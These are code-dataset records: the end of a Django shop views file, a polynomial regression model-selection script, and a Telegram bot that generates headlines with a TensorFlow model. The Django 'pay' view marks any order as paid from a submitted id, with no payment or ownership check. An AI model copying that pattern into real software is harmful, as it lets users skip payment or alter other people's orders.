render(request,'order/order_info.html',{'order':order})\r\n\r\ndef pay(request):\r\n if request.method == 'POST':\r\n order_id = request.POST.get('order_id')\r\n OrderModel.objects.filter(id = order_id).update(o_status = 1)\r\n return JsonResponse({'code':'200'})\r\n # user = request.user\r\n # order = OrderModel.objects.filter(user=user).first()\r\n # order.o_status = 1\r\n # order.save()\r\n # return render(request,'mine/mine.html')\r\n\r\n\r\ndef order_wait_pay(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n orders = OrderModel.objects.filter(user=user,o_status=0)\r\n return render(request,'order/order_list_wait_pay.html',{'orders':orders})\r\n\r\ndef order_payed(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n orders = OrderModel.objects.filter(user=user,o_status=1)\r\n return render(request,'order/order_list_payed.html',{'orders':orders})\r\n\r\ndef waitpay_topay(request):\r\n if request.method == 'GET':\r\n order_id = request.GET.get('order_id')\r\n order = OrderModel.objects.filter(id=order_id).first()\r\n return render(request,'order/order_info.html',{'order':order})", "sub_path": "axf/app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "app.models.MainWheel.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.MainWheel.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.models.MainWheel", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.MainNav.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.MainNav.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.MainNav", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.MainMustBuy.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.MainMustBuy.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.MainMustBuy", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.MainShop.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.MainShop.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.MainShop", "line_number": 18, "usage_type": "name"}, {"api_name": "app.models.MainShow.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models.MainShow.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models.MainShow", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "user.models", "line_number": 35, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 36, "usage_type": "name"}, {"api_name": "user.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "user.models.UserTicketModel.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "user.models.UserTicketModel.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "user.models.UserTicketModel", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models", "line_number": 67, "usage_type": "name"}, {"api_name": "user.models", "line_number": 69, "usage_type": "name"}, {"api_name": "app.models.FoodType.objects.all", "line_number": 71, "usage_type": "call"}, {"api_name": "app.models.FoodType.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "app.models.FoodType", "line_number": 71, "usage_type": "name"}, {"api_name": "app.models.Goods.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "app.models.Goods.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "app.models.Goods", "line_number": 73, "usage_type": "name"}, {"api_name": "app.models.Goods.objects.filter", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Goods.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.models.Goods", "line_number": 75, "usage_type": "name"}, {"api_name": "user.models", "line_number": 96, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 97, "usage_type": "name"}, {"api_name": "user.models", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "user.models", "line_number": 117, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 124, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 124, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 125, "usage_type": "name"}, {"api_name": "user.models", "line_number": 125, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.create", "line_number": 131, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 131, "usage_type": "name"}, {"api_name": "user.models", "line_number": 131, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 133, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 133, "usage_type": "name"}, {"api_name": "user.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 138, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 140, "usage_type": "call"}, {"api_name": "user.models", "line_number": 148, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 153, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 153, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 155, "usage_type": "name"}, {"api_name": "user.models", "line_number": 155, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 166, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 166, "usage_type": "name"}, {"api_name": "user.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 170, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 172, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 175, "usage_type": "call"}, {"api_name": "user.models", "line_number": 179, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 181, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 181, "usage_type": "name"}, {"api_name": "user.models", "line_number": 181, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "user.models", "line_number": 194, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 196, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 202, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 202, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 202, "usage_type": "name"}, {"api_name": "user.models", "line_number": 202, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 212, "usage_type": "call"}, {"api_name": "user.models", "line_number": 216, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 217, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 217, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 217, "usage_type": "name"}, {"api_name": "user.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 225, "usage_type": "call"}, {"api_name": "user.models", "line_number": 231, "usage_type": "name"}, {"api_name": "utils.functions.get_order_random_id", "line_number": 233, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.create", "line_number": 234, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 234, "usage_type": "name"}, {"api_name": "user.models", "line_number": 234, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 237, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 237, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 237, "usage_type": "name"}, {"api_name": "user.models", "line_number": 237, "usage_type": "name"}, {"api_name": "app.models.OrderGoodsModel.objects.create", "line_number": 240, "usage_type": "call"}, {"api_name": "app.models.OrderGoodsModel.objects", "line_number": 240, "usage_type": "attribute"}, {"api_name": "app.models.OrderGoodsModel", "line_number": 240, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 242, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 247, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 247, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 247, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 248, "usage_type": "call"}, {"api_name": "user.models", "line_number": 258, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 259, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 259, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 259, "usage_type": "name"}, {"api_name": "user.models", "line_number": 259, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 260, "usage_type": "call"}, {"api_name": "user.models", "line_number": 264, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 265, "usage_type": "name"}, {"api_name": "user.models", "line_number": 265, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 266, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 271, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 271, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 271, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 272, "usage_type": "call"}]}
+{"seq_id": "405554739", "text": "from samplesinus import SampleSinus\nfrom vizualisation import Vizualisation\nfrom closedform import ClosedForm\nfrom matplotlib import pyplot as plt\n\nclass ModelSelection(object):\n \"\"\" \n Fit different order polynomials to the training data.\n Evaluate model performance using a test data set.\n\n \"\"\"\n\n FIG_W = 6 # Figure width\n FIG_H = 4 # Figure height\n\n BOX = [0.1, 0.1, 0.8, 0.8] # Box axes 1\n YLIM = [0, 1]\n\n CLR_TRAIN = '#003049'\n CLR_TEST = '#D62828'\n\n FRMT_TRAIN = '{0}//tranining_xte.dat'\n FRMT_TEST = '{0}//test_xte.dat'\n\n def __init__(self, Ntraining, Ntest, Mmax):\n \"\"\" Create test and training data set. Fit differt polynomials.\n\n :param Ntraining - int, number of data points in training dataset.\n :param Ntest - int, number of data points in test dataset.\n :param Mmax - int, maximum number for polynomial order.\n \"\"\"\n \n # Create Training Data, Test Data and Function Definition\n FOLDER = 'model_N{0}'.format(Ntraining)\n self.train = self.FRMT_TRAIN.format(FOLDER)\n self.test = self.FRMT_TEST.format(FOLDER) \n\n sin = SampleSinus()\n sin.target(Ntraining, self.train)\n sin.target(Ntest, self.test, xdistr='random')\n SIN_FUNC = '{0}//sinus.func'.format(FOLDER)\n sin.function( SIN_FUNC )\n\n self.Ms = []\n self.RMSEs_train = []\n self.RMSEs_test = []\n\n self.Mmax= Mmax\n for m in range(self.Mmax+1):\n\n model = '{0}//poly_M{1}.func'.format(FOLDER, m)\n fig_name = '{0}//poly_M{1}.png'.format(FOLDER, m)\n weights_name = '{0}/weights_M{1}.dat'.format(FOLDER, m)\n\n cs = ClosedForm(m)\n cs.solve(self.train, weights_name)\n cs.test(self.test)\n cs.function(model)\n\n viz = Vizualisation()\n viz.target(self.train)\n viz.function( SIN_FUNC )\n viz.function(model, clr_option='model')\n viz.to_file( fig_name )\n\n self.Ms.append(m)\n self.RMSEs_train.append( cs.RMSE_train )\n self.RMSEs_test.append( cs.RMSE_test )\n\n file_out = '{0}//model_selection.png'.format( FOLDER )\n self._display_errors(file_out)\n\n def _display_errors(self, file_out):\n \"\"\" Display training and test errors. \"\"\"\n\n self.FIG = plt.figure(figsize=(self.FIG_W, self.FIG_H))\n self.AX1 = self.FIG.add_axes(self.BOX)\n self.AX1.set_xlim([-1, self.Mmax+1])\n self.AX1.set_ylim(self.YLIM)\n\n self.AX1.plot(self.Ms, self.RMSEs_train, \n marker='o',\n linestyle='-',\n linewidth=2,\n color=self.CLR_TRAIN)\n self.AX1.plot(self.Ms, self.RMSEs_test, \n marker='o',\n linestyle='-',\n linewidth=2,\n color=self.CLR_TEST)\n\n self.FIG.savefig(file_out)\n", "sub_path": "cha1/regression/modelselection.py", "file_name": "modelselection.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "samplesinus.SampleSinus", "line_number": 38, "usage_type": "call"}, {"api_name": "closedform.ClosedForm", "line_number": 55, "usage_type": "call"}, {"api_name": "vizualisation.Vizualisation", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "440915268", "text": "import tensorflow as tf\r\n\r\nimport numpy as np\r\nimport os\r\nimport time\r\n\r\nimport telebot\r\nfrom telebot import types\r\nimport random\r\nimport datetime\r\nimport sqlite3\r\n# import all the modules\r\n\r\n\r\n\r\n\r\ntext = open('tutby_titles.txt', 'rb').read().decode(encoding='utf-8')\r\n# writing all the titles from file to variable 'text'\r\n# doing it line by line cause my server wasn't powerful enough to do it in one time\r\n\r\nvocab = sorted(set(text))\r\n# creating vocabulary\r\nprint(f'unique characters {len(vocab)}')\r\n\r\nchar2idx = {u:i for i, u in enumerate(vocab)}\r\n\r\nidx2char = np.array(vocab)\r\n# these two are converting characters to numbers and vice versa\r\n# cause neural networks work only with numbers\r\n\r\n\r\ntext_as_int = np.array([char2idx[c] for c in text])\r\n# making np.array out of all the text as integers\r\n# doing it in 150 times cause, again, my server wasn't powerful enough\r\n\r\n\r\n# The maximum length sentence you want for a single input in characters\r\nseq_length = 265\r\n\r\n\r\n\r\n# creating dataset from array with all letters as integers\r\nchar_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)\r\n# It was done for neural network to understand it\r\n\r\nsequences = char_dataset.batch(seq_length+1, drop_remainder=True)\r\n\r\n\r\ndef split_input_target(chunk):\r\n input_text = chunk[:-1]\r\n target_text = chunk[1:]\r\n return input_text, target_text\r\n\r\n\r\n\r\n\r\n\r\n# Batch size\r\nBATCH_SIZE = 72\r\n\r\n# Buffer size to shuffle the dataset\r\n# (TF data is designed to work with possibly infinite sequences,\r\n# so it doesn't attempt to shuffle the entire sequence in memory. Instead,\r\n# it maintains a buffer in which it shuffles elements).\r\nBUFFER_SIZE = 10000\r\n\r\n\r\n\r\n\r\n# Length of the vocabulary in chars\r\nvocab_size = len(vocab)\r\n\r\n# The embedding dimension\r\nembedding_dim = 256\r\n\r\n# Number of RNN units\r\nrnn_units = 1024\r\n\r\n# function for builing model\r\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\r\n model = tf.keras.Sequential([\r\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\r\n batch_input_shape=[batch_size, None]),\r\n tf.keras.layers.LSTM(rnn_units,\r\n return_sequences=True,\r\n stateful=True,\r\n recurrent_initializer='glorot_uniform'),\r\n tf.keras.layers.Dense(vocab_size)\r\n ])\r\n return model\r\n\r\n\r\n\r\n# Directory where the checkpoints will be saved\r\ncheckpoint_dir = './training_checkpoints'\r\n\r\n\r\n\r\n#building model\r\nmodel = build_model(vocab_size, embedding_dim, rnn_units, batch_size=1)\r\n\r\n\r\n#loading weights of latest checkpoint\r\nmodel.load_weights(tf.train.latest_checkpoint(checkpoint_dir))\r\n\r\n#building model\r\nmodel.build(tf.TensorShape([1, None]))\r\n\r\nprint(model.summary())\r\n\r\n\r\n# main func to generate text\r\ndef generate_text(model, start_string, temper = 0.45):\r\n # Evaluation step (generating text using the learned model)\r\n\r\n # Number of characters to generate\r\n num_generate = 1000\r\n\r\n # Converting our start string to numbers (vectorizing)\r\n input_eval = [char2idx[s] for s in start_string]\r\n input_eval = tf.expand_dims(input_eval, 0)\r\n\r\n # Empty string to store our results\r\n text_generated = []\r\n\r\n # Low temperature results in more predictable text.\r\n # Higher temperature results in more surprising text.\r\n # Experiment to find the best setting.\r\n temperature = temper\r\n\r\n # Here batch size == 1\r\n model.reset_states()\r\n predictions = model(input_eval)\r\n # remove the batch dimension\r\n predictions = tf.squeeze(predictions, 0)\r\n\r\n # using a categorical distribution to predict the character returned by the model\r\n predictions = predictions / temperature\r\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy()\r\n while idx2char[predicted_id] != '₪':\r\n predictions = model(input_eval)\r\n # remove the batch dimension\r\n predictions = tf.squeeze(predictions, 0)\r\n\r\n # using a categorical distribution to predict the character returned by the model\r\n predictions = predictions / temperature\r\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy()\r\n\r\n # Pass the predicted character as the next input to the model\r\n # along with the previous hidden state\r\n input_eval = tf.expand_dims([predicted_id], 0)\r\n\r\n text_generated.append(idx2char[predicted_id])\r\n\r\n return (start_string + ''.join(text_generated))\r\n\r\n#global vatiables for telegram bot\r\n#cause telebot (module for telegam bots) works via decorators and functions under them\r\n#In python to transfer values between functions with variables we need to make them global\r\n#Otherwise, values will remain local to function\r\nglobal new_title\r\nnew_title = ''\r\n\r\nglobal last_temp\r\nlast_temp = 0.53\r\n\r\nglobal last_key\r\nlast_key = ''\r\n\r\nglobal last_w_r\r\nlast_w_r = []\r\n\r\nglobal want_to_send_report\r\nwant_to_send_report = False\r\n\r\nglobal want_to_rply\r\nwant_to_rply = False\r\n\r\n#connecting with bot\r\nbot = telebot.TeleBot('token')\r\n\r\n#keyboard for administrator\r\nadmkb = telebot.types.ReplyKeyboardMarkup(True)\r\nadmkb.row('/about', 'новые сообщения', 'пользователи')\r\n\r\n# connecting with user reports database\r\nconn = sqlite3.connect('user_reports.db')\r\n# cursor to do something with database\r\ncursor = conn.cursor()\r\n# if there is no table in db, create it\r\ncursor.execute('CREATE TABLE IF NOT EXISTS reports (chat TEXT, date TEXT, message_id TEXT, wtchd TEXT)')\r\n\r\n#adding to admin list all users that have to check users info\r\nadmins_list = [504898099]\r\n\r\n#on ready send message to admins that everything is good and bot is running\r\nfor admin in admins_list:\r\n bot.send_message(admin, 'Все готово', reply_markup = admkb)\r\n\r\n\r\n#func to make inline keyboard for telegram bot\r\n#its in func cause it will be called every new messoge so text can be different\r\ndef init_keyb():\r\n keyboard = types.InlineKeyboardMarkup()# creating keyboard\r\n key_like = types.InlineKeyboardButton(text=random.choice(['Класс', 'Отлично', 'Вот это хорошее', 'да', 'запомни это', 'ок', 'норм']), callback_data='like') # creating <> button\r\n key_dis = types.InlineKeyboardButton(text=random.choice(['фе', 'фу', 'ненадо нам больше такого', 'нет', 'бред это все', 'боже что удоли это']), callback_data='bad') # and dislike button\r\n# /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\\r\n# Words that appear in button. Random one\r\n keyboard.add(key_like, key_dis) # adding these buttons to be in one row\r\n key_more = types.InlineKeyboardButton(text='ещё', callback_data='escho') # adding button for creating new title\r\n keyboard.add(key_more) # adding this button\r\n return keyboard #\r\n\r\nkeyboard = init_keyb() # initializing keyboard for the first time\r\n\r\n\r\nadm_rep_kb = types.InlineKeyboardMarkup()\r\nkey_read = types.InlineKeyboardButton(text = 'прочитать след.', callback_data = 'read_rep')\r\nkey_repl = types.InlineKeyboardButton(text = 'Ответить', callback_data = 'reply_to_rep')\r\nadm_rep_kb.add(key_read, key_repl)\r\n\r\nkbkb = telebot.types.ReplyKeyboardMarkup(True)\r\nkbkb.row('/about', 'еще', '/report')\r\n\r\nis_closed = False\r\n\r\nif is_closed:\r\n @bot.message_handler(content_types=['text'])\r\n def busy_with_work(message):\r\n if message.text.lower() in ['бастуете', 'бастуете?', 'забастовка?', 'забастовка', 'бастуешь?']:\r\n bot.send_message(message.chat.id, 'Ну да, бастуем')\r\n else:\r\n bot.send_message(message.chat.id, 'Ведутся технические работы')\r\n\r\n\r\n\r\n@bot.message_handler(commands = ['start', 'about', 'info', 'report'])\r\ndef send_txt_file(message):\r\n global new_title\r\n global want_to_send_report\r\n global last_w_r\r\n if want_to_send_report:\r\n return\r\n if message.text.lower().startswith('/start'):\r\n bot.send_message(message.chat.id, 'Чтобы начать напиши мне любой текст или нажми кнопку <еще> под постом\\n\\nЕсли тебе понравится нейроновсть, то нажми левую кнопку(где будет что-то типа класс, гуд, оу и т.д.), А если нет - то на правую(где будет фу, бред и т. д.)\\n\\nЧтобы получить ещё одну новсть нажми на <ещё>', reply_markup = keyboard)\r\n with open('user_list.txt', 'r') as r_log_file:\r\n if message.from_user not in r_log_file:\r\n open('user_list.txt', 'a').write(f'{message.from_user}\\n\\n')\r\n elif message.text.lower().startswith('/report'):\r\n if len(message.text.split()) > 1:\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n report_data = [str(message.chat), str(datetime.datetime.now()), str(message.chat.id) + ';' + str(message.message_id), False]\r\n cursor.executemany('INSERT INTO reports VALUES (?, ?, ?, ?)', (report_data, ))\r\n bot.send_message(message.chat.id, 'Ваше заявление отправлено', reply_markup = kbkb)\r\n conn.commit()\r\n else:\r\n bot.send_message(message.chat.id, 'Пожалуйста отправьте сообщение, которое вы хотите передать админисратору. Я вас слушаю')\r\n want_to_send_report = True\r\n else:\r\n bot.send_message(message.chat.id, 'Этот бот генерирует заголовки новостей\\n\\nс переменным успехом, но все же\\n\\nЧтобы сгенерировать нейроновость воспользуйтесь кнопками под сообщением\\n\\nДля генерации по первым словам ставте «!» перед сообщением\\n\\nЕсли вы отправите десятичное число(например 0.54 или 3.72), то это изменит генерацию сообщений. Чем больше число, тем более абсурдный и неправдоподобный результат, чем меньше число - наоборот, новости более топорные\\n\\nДля связи с администрацией используйте /report и после пишете сообщение.\\nЛибо /report <Сообщение>', reply_markup = keyboard)\r\n new_title = ''\r\n\r\n\r\n@bot.message_handler(commands = ['file'])\r\ndef send_txt_file(message):\r\n global new_title\r\n global want_to_send_report\r\n if want_to_send_report == False:\r\n if message.chat.id == 504898099:\r\n if message.text.split()[1:] in os.listdir():\r\n bot.send_document(message.chat.id, open(message.text.split()[1:], 'r'))\r\n else:\r\n bot.send_document(message.chat.id, open('phrases_logs.txt', 'r'))\r\n new_title = ''\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef send_neuro_new(message):\r\n keyboard = init_keyb()\r\n global new_title\r\n global last_temp\r\n global last_key\r\n global last_w_r\r\n global want_to_send_report\r\n global want_to_rply\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n print(message.text)\r\n if want_to_send_report:\r\n report_data = [str(message.chat), str(datetime.datetime.now()), str(message.chat.id) + ';' + str(message.message_id), False]\r\n cursor.executemany('INSERT INTO reports VALUES (?, ?, ?, ?)', (report_data, ))\r\n bot.send_message(message.chat.id, 'Ваше заявление отправлено', reply_markup = kbkb)\r\n conn.commit()\r\n want_to_send_report = False\r\n return\r\n elif want_to_rply:\r\n bot.send_message(last_w_r[0], f'Вам пришел ответ от адмнистрации на сообщение от {last_w_r[1][:18]}:\\n' + message.text)\r\n bot.send_message(message.chat.id, 'Сообщение отправлено')\r\n want_to_rply = False\r\n return\r\n else:\r\n pass\r\n if message.text.lower() == 'новые сообщения' and message.chat.id == 504898099:\r\n cursor.execute('SELECT * FROM reports WHERE wtchd = FALSE')\r\n num_of_reps = 0\r\n new_reps = cursor.fetchall()\r\n for reprsrs in new_reps:\r\n num_of_reps += 1\r\n bot.send_message(message.chat.id, f'У вас есть [{num_of_reps}] нов. сообщений', reply_markup = adm_rep_kb)\r\n return\r\n elif message.text.lower() == 'пользователи' and message.chat.id == 504898099:\r\n bot.send_document(message.chat.id, open('user_list.txt', 'r'), caption = 'Файл, со всеми пользователями, нажавшими старт')\r\n return\r\n try:\r\n last_temp = float(message.text)\r\n new_title = generate_text(model, start_string=f\"♣{last_key}\", temper = float(message.text))\r\n except ValueError:\r\n if message.text.startswith('!'):\r\n last_key = message.text[1:]\r\n if 'Й' in message.text:\r\n message.text.replace('Й', 'й')\r\n if message.text.startswith('!Й'):\r\n new_title = generate_text(model, start_string=f\"♣{message.text.replace('!', '♣').replace('Й', 'й')}\")\r\n new_title = '♣' + 'Й' + new_title.replace('♣', '')[1:]\r\n else:\r\n new_title = generate_text(model, start_string=f\"♣{last_key}\")\r\n else:\r\n new_title = generate_text(model, start_string=\"♣\")\r\n last_key = ''\r\n bot.send_message(message.chat.id, new_title.replace('♣', '').replace('₪', ''), reply_markup=keyboard)\r\n with open('phrases_logs.txt', 'a') as log_file:\r\n log_file.write(f'{new_title} [{last_temp}]\\n\\n')\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef callback_worker(call):\r\n keyboard = init_keyb()\r\n global new_title\r\n global last_temp\r\n global want_to_rply\r\n global last_w_r\r\n if call.data == \"escho\":\r\n new_title = generate_text(model, start_string=u\"♣\", temper = last_temp)\r\n bot.send_message(call.message.chat.id, new_title.replace('♣', '').replace('₪', ''), reply_markup=keyboard)\r\n print(call.message.text)\r\n print(last_temp)\r\n with open('phrases_logs.txt', 'a') as log_file:\r\n log_file.write(f'{new_title} [{last_temp}]\\n\\n')\r\n elif call.data == \"like\":\r\n if new_title:\r\n with open('new_tutby_titles.txt', 'a') as sess_file:\r\n sess_file.write(f'{new_title}\\n\\n')\r\n bot.send_message(call.message.chat.id, 'Ок', reply_markup=keyboard)\r\n new_title = ''\r\n else:\r\n bot.send_message(call.message.chat.id, 'Нечего учитывать', reply_markup = keyboard)\r\n elif call.data == \"bad\":\r\n if new_title:\r\n with open('bad_tutby_titles.txt', 'a') as sess_file:\r\n sess_file.write(f'{new_title}\\n\\n')\r\n bot.send_message(call.message.chat.id, 'Такое больше не повторится(надеюсь)', reply_markup=keyboard)\r\n new_title = ''\r\n else:\r\n bot.send_message(call.message.chat.id, 'Нечего учитывать', reply_markup = keyboard)\r\n elif call.data == 'read_rep':\r\n conn = sqlite3.connect('user_reports.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM reports WHERE wtchd = FALSE')\r\n new_reps = cursor.fetchone()\r\n if not new_reps:\r\n bot.send_message(call.message.chat.id, 'Сообщения закончились')\r\n else:\r\n reporrt = new_reps\r\n report_fn = reporrt[0].split(',')[4].replace(\"'\", \"\").replace('first_name: ', '')\r\n report_un = reporrt[0].split(',')[3].replace(\"'\", \"\").replace('username: ', '')\r\n bot.forward_message(call.message.chat.id, reporrt[2].split(';')[0], reporrt[2].split(';')[1])\r\n bot.send_message(call.message.chat.id, f\"\"\"Получено от {report_fn} {report_un}\\nв {reporrt[1][:18]}\"\"\", reply_markup = adm_rep_kb)\r\n last_w_r = reporrt[2].split(';')\r\n cursor.execute(f'UPDATE reports SET wtchd = TRUE WHERE message_id = ?', (reporrt[2], ))\r\n conn.commit()\r\n elif call.data == 'reply_to_rep':\r\n bot.send_message(call.message.chat.id, 'Я тея слушаю')\r\n want_to_rply = True\r\n\r\nbot.polling()\r\n", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 16621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorShape", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 139, "usage_type": "call"}, 